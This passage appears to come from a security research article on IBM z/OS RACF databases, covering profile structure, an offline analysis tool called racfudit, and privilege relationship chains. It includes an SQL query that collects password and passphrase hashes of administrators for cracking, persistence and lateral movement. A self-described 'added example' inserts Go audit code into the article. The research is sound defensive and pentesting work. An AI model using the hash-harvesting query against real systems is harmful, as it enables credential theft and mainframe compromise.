z/OS.</p>
<p>Let’s consider an example of user authorization within the Time Sharing Option (<a href="https://www.ibm.com/docs/en/zos-basic-skills?topic=interfaces-what-is-tso" target="_blank" rel="noopener">TSO</a>) subsystem, the z/OS equivalent of a command line interface. We use an x3270 terminal emulator to connect to the mainframe. After successful user authentication in z/OS, the TSO subsystem uses SAF to query the RACF security package, checking that the user has permission to access the TSO resource manager. The RACF service queries the database for user information, which is stored in a user profile. If the database contains a record of the required access permissions, the user is authorized, and information from the user profile is placed into the address space of the new TSO session within the <a href="https://www.ibm.com/docs/en/zos/2.4.0?topic=areas-acee-accessor-environment-element" target="_blank" rel="noopener">ACEE</a> (Accessor Environment Element) control block. For subsequent attempts to access other z/OS resources within that TSO session, RACF uses the information in ACEE to make the decision on granting user access. SAF reads data from ACEE and transmits it to the RACF service. RACF makes the decision to grant or deny access, based on information in the relevant profile of the requested resource stored in the database. This decision is then sent back to SAF, which processes the user request accordingly. The process of querying RACF repeats for any further attempts by the user to access other resources or execute commands within the TSO session.</p>
<p>Thus, RACF handles identification, authentication, and authorization of users, as well as granting privileges within z/OS.</p>
<h3 id="racf-database-components">RACF database components</h3>
<p>As discussed above, access decisions for resources within z/OS are made based on information stored in the RACF database. This data is kept in the form of records, or as RACF terminology puts it, profiles. These contain details about specific z/OS objects. While the RACF database can hold various profile types, four main types are especially important for security analysis:</p>
<ol>
<li><a href="https://www.ibm.com/docs/en/zos/2.5.0?topic=users-user-profiles" target="_blank" rel="noopener">User profile</a> holds user-specific information such as logins, password hashes, special attributes, and the groups the user belongs to.</li>
<li><a href="https://www.ibm.com/docs/en/zos/2.5.0?topic=groups-group-profiles" target="_blank" rel="noopener">Group profile</a> contains information about a group, including its members, owner, special attributes, list of subgroups, and the access permissions of group members for that group.</li>
<li><a href="https://www.ibm.com/docs/en/zos/2.5.0?topic=sets-data-set-profiles" target="_blank" rel="noopener">Data set profile</a> stores details about a data set, including access permissions, attributes, and auditing policy.</li>
<li><a href="https://www.ibm.com/docs/en/zos/2.5.0?topic=resources-defining-profiles-general" target="_blank" rel="noopener">General resource profile</a> provides information about a resource or resource class, such as resource holders, their permissions regarding the resource, audit policy, and the resource owner.</li>
</ol>
<p>The RACF database contains numerous instances of these profiles. Together, they form a complex structure of relationships between objects and subjects within z/OS, which serves as the basis for access decisions.</p>
<h4 id="logical-structure-of-racf-database-profiles">Logical structure of RACF database profiles</h4>
<p>Each profile is composed of one or more segments. Different profile types utilize different segment types.</p>
<p>For example, a user profile instance may contain the following segments:</p>
<ul>
<li>BASE: core user information in RACF (mandatory segment);</li>
<li>TSO: user TSO-session parameters;</li>
<li>OMVS: user session parameters within the z/OS UNIX subsystem;</li>
<li>KERB: data related to the z/OS Network Authentication Service, essential for Kerberos protocol operations;</li>
<li>and others.</li>
</ul>
<div id="attachment_116876" style="width: 1486px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222934/zos-mainframe2.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116876" class="size-full wp-image-116876" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222934/zos-mainframe2.png" alt="User profile segments" width="1476" height="703" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222934/zos-mainframe2.png 1476w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222934/zos-mainframe2-300x143.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222934/zos-mainframe2-1024x488.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222934/zos-mainframe2-768x366.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222934/zos-mainframe2-735x350.png 735w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222934/zos-mainframe2-740x352.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222934/zos-mainframe2-588x280.png 588w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06222934/zos-mainframe2-800x381.png 800w" sizes="auto, (max-width: 1476px) 100vw, 1476px" /></a><p id="caption-attachment-116876" class="wp-caption-text">User profile segments</p></div>
<p>Different segment types are distinguished by the set of fields they store. For instance, the BASE segment of a user profile contains the following fields:</p>
<ul>
<li>PASSWORD: the user’s password hash;</li>
<li>PHRASE: the user’s password phrase hash;</li>
<li>LOGIN: the user’s login;</li>
<li>OWNER: the owner of the user profile;</li>
<li>AUTHDATE: the date of the user profile creation in the RACF database;</li>
<li>and others.</li>
</ul>
<p>The PASSWORD and PHRASE fields are particularly interesting for security analysis, and we will dive deeper into these later.</p>
<h3 id="racf-database-structure">RACF database structure</h3>
<p>It is worth noting that the RACF database is stored as a specialized data set with a specific format. Grasping this format is very helpful when analyzing the DB and mapping the relationships between z/OS objects and subjects.</p>
<p>As discussed in our <a href="https://securelist.com/zos-mainframe-pentesting/113427/#authorized-program-facility" target="_blank" rel="noopener">previous article</a>, a data set is the mainframe equivalent of a file, composed of a series of blocks.</p>
<div id="attachment_116877" style="width: 1035px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223037/zos-mainframe3.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116877" class="size-full wp-image-116877" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223037/zos-mainframe3.png" alt="RACF DB structure" width="1025" height="672" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223037/zos-mainframe3.png 1025w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223037/zos-mainframe3-300x197.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223037/zos-mainframe3-768x504.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223037/zos-mainframe3-534x350.png 534w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223037/zos-mainframe3-740x485.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223037/zos-mainframe3-427x280.png 427w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223037/zos-mainframe3-800x524.png 800w" sizes="auto, (max-width: 1025px) 100vw, 1025px" /></a><p id="caption-attachment-116877" class="wp-caption-text">RACF DB structure</p></div>
<p>The image above illustrates the RACF database structure, detailing the data blocks and their offsets. From the RACF DB analysis perspective, and when subsequently determining the relationships between z/OS objects and subjects, the most critical blocks include:</p>
<ul>
<li>The header block, or inventory control block (ICB), which contains various metadata and pointers to all other data blocks within the RACF database. By reading the ICB, you gain access to the rest of the data blocks.</li>
<li>Index blocks, which form a singly linked list that contains pointers to all profiles and their segments in the RACF database – that is, to the information about all users, groups, data sets, and resources.</li>
<li>Templates: a crucial data block containing templates for all profile types (user, group, data set, and general resource profiles). The templates list fields and specify their format for every possible segment type within the corresponding profile type.</li>
</ul>
<p>Upon dissecting the RACF database structure, we identified the need for a utility capable of extracting all relevant profile information from the DB, regardless of its version. This utility would also need to save the extracted data in a convenient format for offline analysis. Performing this type of analysis provides a comprehensive picture of the relationships between all objects and subjects for a specific z/OS installation, helping uncover potential security vulnerabilities that could lead to privilege escalation or lateral movement.</p>
<h2 id="utilities-for-racf-db-analysis">Utilities for RACF DB analysis</h2>
<p>At the previous stage, we defined the following functional requirements for a RACF DB analysis utility:</p>
<ol>
<li>The ability to analyze RACF profiles offline without needing to run commands on the mainframe</li>
<li>The ability to extract exhaustive information about RACF profiles stored in the DB</li>
<li>Compatibility with various RACF DB versions</li>
<li>Intuitive navigation of the extracted data and the option to present it in various formats: plaintext, JSON, SQL, etc.</li>
</ol>
<h3 id="overview-of-existing-racf-db-analysis-solutions">Overview of existing RACF DB analysis solutions</h3>
<p>We started by analyzing off-the-shelf tools and evaluating their potential for our specific needs:</p>
<ul>
<li><a href="https://github.com/willstruggle/john/blob/master/racf2john" target="_blank" rel="noopener">Racf2john</a> extracts user password hashes (from the PASSWORD field) encrypted with the DES and KDFAES algorithms from the RACF database. While this was a decent starting point, we needed more than just the PASSWORD field; specifically, we also needed to retrieve content from other profile fields like PHRASE.</li>
<li><a href="https://github.com/mainframed/racf2sql" target="_blank" rel="noopener">Racf2sql</a> takes a RACF DB dump as input and converts it into an SQLite database, which can then be queried with SQL. This is convenient, but the conversion process risks losing data critical for z/OS security assessment and identifying misconfigurations. Furthermore, the tool requires a database dump generated by the z/OS <a href="https://www.ibm.com/docs/en/zos/2.1.0?topic=database-using-racf-unload-utility-irrdbu00" target="_blank" rel="noopener">IRRDBU00</a> utility (part of the RACF security package) rather than the raw database itself.</li>
<li><a href="https://www.ibm.com/docs/en/zos/2.1.0?topic=interfaces-irrxutil-rexx-interface-r-admin-extract" target="_blank" rel="noopener">IRRXUTIL</a> allows querying the RACF DB to extract information. It is also part of the RACF security package. It can be conveniently used with a <a href="https://github.com/lnlyssg/IRRXUTIL" target="_blank" rel="noopener">set of scripts</a> written in REXX (an interpreted language used in z/OS). However, these scripts demand elevated privileges (access to one or more IRR.RADMIN.** resources in the FACILITY resource class) and must be executed directly on the mainframe, which is unsuitable for the task at hand.</li>
<li><a href="https://github.com/lnlyssg/zos/blob/main/racf_debug_cleanup.c" target="_blank" rel="noopener">Racf_debug_cleanup.c</a> directly analyzes a RACF DB from a data set copy. A significant drawback is that it only parses BASE segments and outputs results in plaintext.</li>
</ul>
<p>As you can see, existing tools don’t satisfy our needs. Some utilities require direct execution on the mainframe. Others operate on a data set copy and extract incomplete information from the DB. Moreover, they rely on hardcoded offsets and signatures within profile segments, which can vary across RACF versions. Therefore, we decided to develop our own utility for RACF database analysis.</p>
<h3 id="introducing-racfudit">Introducing racfudit</h3>
<p>We have written our own platform-independent utility <a href="https://github.com/klsecservices/racfudit" target="_blank" rel="noopener">racfudit</a> in Golang and tested it across various z/OS versions (1.13, 2.02, and 3.1). Below, we delve into the operating principles, capabilities and advantages of our new tool.</p>
<h4 id="extracting-data-from-the-racf-db">Extracting data from the RACF DB</h4>
<p>To analyze RACF DB information offline, we first needed a way to extract structured data. We developed a two-stage approach for this:</p>
<ul>
<li>The first stage involves analyzing the templates stored within the RACF DB. Each template describes a specific profile type, its constituent segments, and the fields within those segments, including their type and size. This allows us to obtain an up-to-date list of profile types, their segments, and associated fields, regardless of the RACF version.</li>
<li>In the second stage, we traverse all index blocks to extract every profile with its content from the RACF DB. These collected profiles are then processed and parsed using the templates obtained in the first stage.</li>
</ul>
<p>The first stage is crucial because RACF DB profiles are stored as unstructured byte arrays. The templates are what define how each specific profile (byte array) is processed based on its type.</p>
<p>Thus, we defined the following algorithm to extract structured data.</p>
<div id="attachment_116878" style="width: 2148px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223320/zos-mainframe4.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116878" class="size-full wp-image-116878" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223320/zos-mainframe4.png" alt="Extracting data from the RACF DB using templates" width="2138" height="1018" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223320/zos-mainframe4.png 2138w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223320/zos-mainframe4-300x143.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223320/zos-mainframe4-1024x488.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223320/zos-mainframe4-768x366.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223320/zos-mainframe4-1536x731.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223320/zos-mainframe4-2048x975.png 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223320/zos-mainframe4-735x350.png 735w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223320/zos-mainframe4-740x352.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223320/zos-mainframe4-588x280.png 588w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223320/zos-mainframe4-800x381.png 800w" sizes="auto, (max-width: 2138px) 100vw, 2138px" /></a><p id="caption-attachment-116878" class="wp-caption-text">Extracting data from the RACF DB using templates</p></div>
<ol>
<li>We offload the RACF DB from the mainframe and read its header block (ICB) to determine the location of the templates.</li>
<li>Based on the template for each profile type, we define an algorithm for structuring specific profile instances according to their type.</li>
<li>We use the content of the header block to locate the index blocks, which store pointers to all profile instances.</li>
<li>We read all profile instances and their segments sequentially from the list of index blocks.</li>
<li>For each profile instance and its segments we read, we apply the processing algorithm based on the corresponding template.</li>
<li>All processed profile instances are saved in an intermediate state, allowing for future storage in various formats, such as plaintext or SQLite.</li>
</ol>
<p>The advantage of this approach is its version independence. Even if templates and index blocks change their structure across RACF versions, our utility will not lose data because it dynamically determines the structure of each profile type based on the relevant template.</p>
<h4 id="analyzing-extracted-racf-db-information">Analyzing extracted RACF DB information</h4>
<p>Our racfudit utility can present collected RACF DB information as an SQLite database or a plaintext file.</p>
<div id="attachment_116901" style="width: 772px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091329/zOS-RACF-graphics.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116901" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091329/zOS-RACF-graphics.png" alt="RACF DB information as an SQLite DB (top) and text data (bottom)" width="762" height="993" class="size-full wp-image-116901" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091329/zOS-RACF-graphics.png 762w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091329/zOS-RACF-graphics-230x300.png 230w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091329/zOS-RACF-graphics-269x350.png 269w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091329/zOS-RACF-graphics-740x964.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091329/zOS-RACF-graphics-215x280.png 215w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091329/zOS-RACF-graphics-691x900.png 691w" sizes="auto, (max-width: 762px) 100vw, 762px" /></a><p id="caption-attachment-116901" class="wp-caption-text">RACF DB information as an SQLite DB (top) and text data (bottom)</p></div>
<p>Using SQLite, you can execute SQL queries to identify misconfigurations in RACF that could be exploited for privilege escalation, lateral movement, bypassing access controls, or other pentesting tactics. It is worth noting that the set of SQL queries used for processing information in SQLite can be adapted to validate current RACF settings against <a href="https://www.ibm.com/support/pages/ibm-security-zsecure-31-compliance-standards-march-2025" target="_blank" rel="noopener">security standards</a> and <a href="https://mainframestig.com/wp-content/uploads/2023/02/CIS_IBM_z_OS_V2R5_with_RACF_Benchmark_v1.0.0.pdf" target="_blank" rel="noopener">best practices</a>. Let’s look at some specific examples of how to use the racfudit utility to uncover security issues.</p>
<h5 id="collecting-password-hashes">Collecting password hashes</h5>
<p>One of the primary goals in penetration testing is to get a list of administrators and a way to authorize using their credentials. This can be useful for maintaining persistence on the mainframe, moving laterally to other mainframes, or even pivoting to servers running different operating systems. Administrators are typically found in the SYS1 group and its subgroups. The example below shows a query to retrieve hashes of passwords (PASSWORD) and password phrases (PHRASE) for privileged users in the SYS1 group.</p>
<pre class="urvanov-syntax-highlighter-plain-tag">select ProfileName, PHRASE, PASSWORD, CONGRPNM from USER_BASE where CONGRPNM LIKE '%SYS1%';</pre>
<p>Of course, to log in to the system, you need to crack these hashes to recover the actual passwords. We cover that in more detail below.</p>
<h5 id="searching-for-inadequate-uacc-control-in-data-sets">Searching for inadequate UACC control in data sets</h5>
<p>The universal access authority (UACC) defines the default access permissions to the data set. This parameter specifies the level of access for all users who do not have specific access permissions configured. Insufficient control over UACC values can pose a significant risk if elevated access permissions (UPDATE or higher) are set for data sets containing sensitive data or for <a href="https://securelist.com/zos-mainframe-pentesting/113427/#authorized-program-facility" target="_blank" rel="noopener">APF libraries</a>, which could allow privilege escalation. The query below helps identify data sets with default ALTER access permissions, which allow users to read, delete and modify the data set.</p>
<pre class="urvanov-syntax-highlighter-plain-tag">select ProfileName, UNIVACS from DATASET_BASE where UNIVACS LIKE '1%';</pre>
<p>The UACC field is not exclusive to data set profiles; it also appears in other profile types. Weak control over this field in any of them can give a penetration tester access to the corresponding resources.</p>
<h2 id="racf-profile-relationships">RACF profile relationships</h2>
<p>As mentioned earlier, various RACF entities have relationships. Some are explicitly defined; for example, a username might be listed in a group profile within its member field (USERID field). However, there are also implicit relationships. For instance, if a user group has UPDATE access to a specific data set, every member of that group implicitly has write access to that data set. This is a simple example of implicit relationships. Next, we delve into more complex and specific relationships within the RACF database that a penetration tester can exploit.</p>
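<p>To make the implicit relationships described above concrete, here is an added example (not part of the article and not racfudit code) in Go, the language racfudit is written in. It resolves a user's effective access to a data set from the OPERATIONS attribute, the explicit access-list entry, group membership (GROUPIDS) and UACC, then reports every user who reaches UPDATE or higher. The checking order is a simplified model of RACF's, treating OPERATIONS as ALTER exactly as the article does for pentesting purposes, and all users and data set profiles are constructed sample data.</p>

```go
package main

import (
	"fmt"
	"sort"
)

// Access authority levels in RACF's hierarchy, lowest to highest.
type Access int

const (
	None Access = iota
	Execute
	Read
	Update
	Control
	Alter
)

func (a Access) String() string {
	return [...]string{"NONE", "EXECUTE", "READ", "UPDATE", "CONTROL", "ALTER"}[a]
}

type User struct {
	Name       string
	Groups     []string // GROUPIDS: groups the user belongs to
	Operations bool     // OPERATIONS attribute
}

// DataSetProfile carries a data set profile's UACC and access list (keyed by user ID or group).
type DataSetProfile struct {
	Name       string
	UACC       Access
	AccessList map[string]Access
}

// EffectiveAccess resolves what a user can do with a data set, in simplified RACF
// order: OPERATIONS (treated as ALTER, as the article does for pentesting), then an
// explicit user entry, then the highest of the user's group entries, and only then UACC.
func EffectiveAccess(u User, ds DataSetProfile) (Access, string) {
	if u.Operations {
		return Alter, "OPERATIONS attribute"
	}
	if a, ok := ds.AccessList[u.Name]; ok {
		return a, "user entry in access list"
	}
	best, via, found := None, "", false
	for _, g := range u.Groups {
		if a, ok := ds.AccessList[g]; ok && (!found || a > best) {
			best, via, found = a, "group "+g, true
		}
	}
	if found {
		return best, via
	}
	return ds.UACC, "UACC"
}

type Finding struct {
	User, DataSet, Via string
	Access             Access
}

// AuditAccess lists every (user, data set) pair whose effective access reaches minLevel.
func AuditAccess(users []User, sets []DataSetProfile, minLevel Access) []Finding {
	var out []Finding
	for _, ds := range sets {
		for _, u := range users {
			if a, via := EffectiveAccess(u, ds); a >= minLevel {
				out = append(out, Finding{u.Name, ds.Name, via, a})
			}
		}
	}
	sort.Slice(out, func(i, j int) bool { // order by data set, then user
		return out[i].DataSet+" "+out[i].User < out[j].DataSet+" "+out[j].User
	})
	return out
}

// Constructed sample data; not taken from any real RACF database.
var sampleUsers = []User{
	{Name: "IBMUSER", Groups: []string{"SYS1"}, Operations: true},
	{Name: "DEVA", Groups: []string{"DEVGRP"}},
	{Name: "AUDIT1", Groups: []string{"AUDGRP"}},
	{Name: "GUEST", Groups: []string{"USERS"}},
}
var sampleSets = []DataSetProfile{
	// DEVGRP holds UPDATE, so every DEVGRP member implicitly has write access.
	{Name: "SYS1.LINKLIB", UACC: Read, AccessList: map[string]Access{"DEVGRP": Update, "AUDIT1": Read}},
	// UACC ALTER: anyone without a more specific entry may read, modify or delete it.
	{Name: "PROD.PAYROLL.DATA", UACC: Alter, AccessList: map[string]Access{"AUDGRP": Read}},
}

func main() {
	for _, f := range AuditAccess(sampleUsers, sampleSets, Update) {
		fmt.Printf("%-8s %-18s %-7s via %s\n", f.User, f.DataSet, f.Access, f.Via)
	}
}
```

Note that AUDIT1 ends up with READ on PROD.PAYROLL.DATA despite UACC ALTER, because an access-list entry for one of the user's groups takes precedence over UACC.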
<h3 id="racf-profile-fields">RACF profile fields</h3>
<p>A deep dive into RACF internal architecture reveals that misconfigurations of access permissions and other attributes for various RACF entities can be difficult to detect and remediate in some scenarios. These seemingly minor errors can be critical, potentially leading to mainframe compromise. The explicit and implicit relationships within the RACF database collectively define the mainframe’s current security posture. As mentioned, each profile type in the RACF database has a unique set of fields and attributes that describe how profiles relate to one another. Based on these fields and attributes, we have compiled lists of key fields that help build and analyze relationship chains.</p>
<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223602/zos-mainframe6.png" class="magnificImage"><img loading="lazy" decoding="async" class="size-full wp-image-116880" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223602/zos-mainframe6.png" width="1244" height="1244" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223602/zos-mainframe6.png 1244w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223602/zos-mainframe6-300x300.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223602/zos-mainframe6-1024x1024.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223602/zos-mainframe6-150x150.png 150w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223602/zos-mainframe6-768x768.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223602/zos-mainframe6-350x350.png 350w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223602/zos-mainframe6-740x740.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223602/zos-mainframe6-280x280.png 280w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223602/zos-mainframe6-800x800.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223602/zos-mainframe6-50x50.png 50w" sizes="auto, (max-width: 1244px) 100vw, 1244px" /></a>
<p><em>User profile fields</em></p>
<ul>
<li>SPECIAL: indicates that the user has privileges to execute any RACF command and grants them full control over all profiles in the RACF database.</li>
<li>OPERATIONS: indicates whether the user has authorized access to all RACF-protected resources of the DATASET, DASDVOL, GDASDVOL, PSFMPL, TAPEVOL, VMBATCH, VMCMD, VMMDISK, VMNODE, and VMRDR classes. While actions for users with this field specified are subject to certain restrictions, in a penetration testing context the OPERATIONS field often indicates full data set access.</li>
<li>AUDITOR: indicates whether the user has permission to access audit information.</li>
<li>AUTHOR: the creator of the user. It has certain privileges over the user, such as the ability to change their password.</li>
<li>REVOKE: indicates whether the user can log in to the system.</li>
<li>Password TYPE: specifies the hash type (DES or KDFAES) for passwords and password phrases. This field is not natively present in the user profile, but it can be created based on how different passwords and password phrases are stored.</li>
<li>Group-SPECIAL: indicates whether the user has full control over all profiles within the scope defined by the group or groups field. This is a particularly interesting field that we explore in more detail below.</li>
<li>Group-OPERATIONS: indicates whether the user has authorized access to all RACF-protected resources of the DATASET, DASDVOL, GDASDVOL, PSFMPL, TAPEVOL, VMBATCH, VMCMD, VMMDISK, VMNODE and VMRDR classes within the scope defined by the group or groups field.</li>
<li>Group-AUDITOR: indicates whether the user has permission to access audit information within the scope defined by the group or groups field.</li>
<li>CLAUTH (class authority): allows the user to create profiles within the specified class or classes. This field enables delegation of management privileges for individual classes.</li>
<li>GROUPIDS: contains a list of groups the user belongs to.</li>
<li>UACC (universal access authority): defines the UACC value for new profiles created by the user.</li>
</ul>
<p><em>Group profile fields</em></p>
<ul>
<li>UACC (universal access authority): defines the UACC value for new profiles that the user creates when connected to the group.</li>
<li>OWNER: the creator of the group. The owner has specific privileges in relation to the current group and its subgroups.</li>
<li>USERIDS: the list of users within the group. The order is essential.</li>
<li>USERACS: the list of group members with their respective permissions for access to the group. The order is essential.</li>
<li>SUPGROUP: the name of the superior group.</li>
</ul>
<p><em>General resource and data set profile fields</em></p>
<ul>
<li>UACC (universal access authority): defines the default access permissions to the resource or data set.</li>
<li>OWNER: the creator of the resource or data set, who holds certain privileges over it.</li>
<li>WARNING: indicates whether the resource or data set is in WARNING mode.</li>
<li>USERIDS: the list of user IDs associated with the resource or data set. The order is essential.</li>
<li>USERACS: the list of users with access permissions to the resource or data set. The order is essential.</li>
</ul>
<h3 id="racf-profile-relationship-chains">RACF profile relationship chains</h3>
<p>The fields listed above demonstrate the presence of relationships between RACF profiles. We have decided to name these relationships similarly to those used in <a href="https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html" target="_blank" rel="noopener">BloodHound</a>, a popular tool for analyzing Active Directory misconfigurations. Below are some examples of these relationships – the list is not exhaustive.</p>
<ul>
<li>Owner: the subject owns the object.</li>
<li>MemberOf: the subject is part of the object.</li>
<li>AllowJoin: the subject has permission to add itself to the object.</li>
<li>AllowConnect: the subject has permission to add another object to the specified object.</li>
<li>AllowCreate: the subject has permission to create an instance of the object.</li>
<li>AllowAlter: the subject has the ALTER privilege for the object.</li>
<li>AllowUpdate: the subject has the UPDATE privilege for the object.</li>
<li>AllowRead: the subject has the READ privilege for the object.</li>
<li>CLAuthTo: the subject has permission to create instances of the object as defined in the CLAUTH field.</li>
<li>GroupSpecial: the subject has full control over all profiles within the object’s scope of influence as defined in the group-SPECIAL field.</li>
<li>GroupOperations: the subject has permissions to perform certain operations with the object as defined in the group-OPERATIONS field.</li>
<li>ImpersonateTo: the subject grants the object the privilege to perform certain operations on the subject’s behalf.</li>
<li>ResetPassword: the subject grants another object the privilege to reset the password or password phrase of the specified object.</li>
<li>UnixAdmin: the subject grants superuser privileges to the object in z/OS UNIX.</li>
<li>SetAPF: the subject grants another object the privilege to set the APF flag on the specified object.</li>
</ul>
<p>These relationships serve as edges when constructing a graph of subject–object interconnections. Below are examples of potential relationships between specific profile types.</p>
<div id="attachment_116881" style="width: 1568px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223708/zos-mainframe7.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116881" class="size-full wp-image-116881" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223708/zos-mainframe7.png" alt="Examples of relationships between RACF profiles" width="1558" height="1254" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223708/zos-mainframe7.png 1558w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223708/zos-mainframe7-300x241.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223708/zos-mainframe7-1024x824.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223708/zos-mainframe7-768x618.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223708/zos-mainframe7-1536x1236.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223708/zos-mainframe7-435x350.png 435w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223708/zos-mainframe7-740x596.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223708/zos-mainframe7-348x280.png 348w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223708/zos-mainframe7-800x644.png 800w" sizes="auto, (max-width: 1558px) 100vw, 1558px" /></a><p id="caption-attachment-116881" class="wp-caption-text">Examples of relationships between RACF profiles</p></div>
<p>Visualizing and analyzing these relationships helped us identify specific chains that describe potential RACF security issues, such as a path from a low-privileged user to a highly-privileged one. Before we delve into examples of these chains, let’s consider another interesting and peculiar feature of the relationships between RACF database entities.</p>
<h3 id="implicit-racf-profile-relationships">Implicit RACF profile relationships</h3>
<p>We have observed a fascinating characteristic of the group-SPECIAL, group-OPERATIONS, and group-AUDITOR fields within a user profile. If the user has any group specified in one of these fields, that group’s scope of influence <a href="https://www.ibm.com/docs/en/zos/2.2.0?topic=level-scope-authority-users-group-attributes" target="_blank" rel="noopener">extends</a> the user’s own scope.</p>
<div id="attachment_116882" style="width: 1534px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223808/zos-mainframe8.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116882" class="size-full wp-image-116882" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223808/zos-mainframe8.png" alt="Scope of influence of a user with a group-SPECIAL field" width="1524" height="1209" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223808/zos-mainframe8.png 1524w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223808/zos-mainframe8-300x238.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223808/zos-mainframe8-1024x812.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223808/zos-mainframe8-768x609.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223808/zos-mainframe8-441x350.png 441w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223808/zos-mainframe8-740x587.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223808/zos-mainframe8-353x280.png 353w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223808/zos-mainframe8-800x635.png 800w" sizes="auto, (max-width: 1524px) 100vw, 1524px" /></a><p id="caption-attachment-116882" class="wp-caption-text">Scope of influence of a user with a group-SPECIAL field</p></div>
